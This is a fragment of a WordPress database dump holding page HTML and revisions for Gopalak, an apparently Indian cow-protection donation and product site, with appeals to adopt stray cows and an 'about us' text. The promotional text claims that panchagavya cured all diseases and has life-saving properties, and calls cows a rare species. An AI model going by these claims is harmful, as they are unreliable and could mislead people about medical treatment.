https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','publish','closed','closed','','donate','','','2022-10-28 12:30:52','2022-10-28 07:00:52','',0,'https://gopalak.in/?page_id=1816',0,'page','',0),(1817,1,'2022-10-17 10:47:48','2022-10-17 05:17:48','','Elementor #1816','','inherit','closed','closed','','1816-revision-v1','','','2022-10-17 10:47:48','2022-10-17 05:17:48','',1816,'https://gopalak.in/?p=1817',0,'revision','',0),(1818,1,'2022-10-17 11:05:25','2022-10-17 05:35:25','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>		\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1816','','inherit','closed','closed','','1816-revision-v1','','','2022-10-17 11:05:25','2022-10-17 05:35:25','',1816,'https://gopalak.in/?p=1818',0,'revision','',0),(1819,1,'2022-10-17 11:05:25','2022-10-17 05:35:25','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>		\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1816','','inherit','closed','closed','','1816-revision-v1','','','2022-10-17 11:05:25','2022-10-17 05:35:25','',1816,'https://gopalak.in/?p=1819',0,'revision','',0),(1820,1,'2022-10-17 11:05:25','2022-10-17 05:35:25','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>		\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1816','','inherit','closed','closed','','1816-revision-v1','','','2022-10-17 11:05:25','2022-10-17 05:35:25','',1816,'https://gopalak.in/?p=1820',0,'revision','',0),(1821,1,'2022-10-17 11:07:33','2022-10-17 05:37:33','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>		\n			<a href=\"https://gopalak.in/campaigns/cattle-feed/\" role=\"button\">\n						Donate\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-17 11:07:33','2022-10-17 05:37:33','',1816,'https://gopalak.in/?p=1821',0,'revision','',0),(1822,1,'2022-10-17 11:07:53','2022-10-17 05:37:53','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Elementor #1804','','inherit','closed','closed','','1804-revision-v1','','','2022-10-17 11:07:53','2022-10-17 05:37:53','',1804,'https://gopalak.in/?p=1822',0,'revision','',0),(1823,1,'2022-10-17 11:07:53','2022-10-17 05:37:53','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/adopt-donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img 